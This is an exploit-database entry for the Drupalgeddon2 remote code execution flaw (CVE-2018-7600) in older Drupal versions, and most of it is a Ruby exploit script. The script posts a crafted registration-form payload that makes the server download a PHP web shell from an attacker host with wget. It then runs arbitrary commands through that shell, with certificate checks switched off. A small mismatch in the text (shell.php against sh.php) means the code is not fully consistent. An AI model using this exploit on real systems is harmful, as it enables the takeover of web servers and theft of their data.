Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution



EKU-ID: 7522 CVE: 2018-7600 OSVDB-ID:
Author: Hans Topo Published: 2018-04-16 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# EDB-Note. Have the contents of "shell" on http://attacker/shell.php
 
require 'net/http'
 
# Hans Topo ruby port from Drupalggedon2 exploit.
# Based on Vitalii Rudnykh exploit
 
target = ARGV[0]
command = ARGV[1]
 
url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
 
shell = "<?php system($_GET['cmd']); ?>"
 
payload = 'mail%5B%23markup%5D%3Dwget%20http%3A%2F%2Fattacker%2Fshell.php%26mail%5B%23type%5D%3Dmarkup%26form_id%3Duser_register_form%26_drupal_ajax%3D1%26mail%5B%23post_render%5D%5B%5D%3Dexec'
 
uri = URI(url)
 
http = Net::HTTP.new(uri.host,uri.port)
 
if uri.scheme == 'https'
    http.use_ssl = true
    http.verify_mode = OpenSSL::SSL::VERIFY_NONE
end
 
req = Net::HTTP::Post.new(uri.path)
req.body = payload
 
response = http.request(req)
 
if response.code != "200"
    puts "[*] Response: " + response.code
    puts "[*] Target seems not to be exploitable"
    exit
end
 
puts "[*] Target seems to be exploitable."
 
exploit_uri = URI(target+"/sh.php?cmd=#{command}")
response = Net::HTTP.get_response(exploit_uri)
puts response.body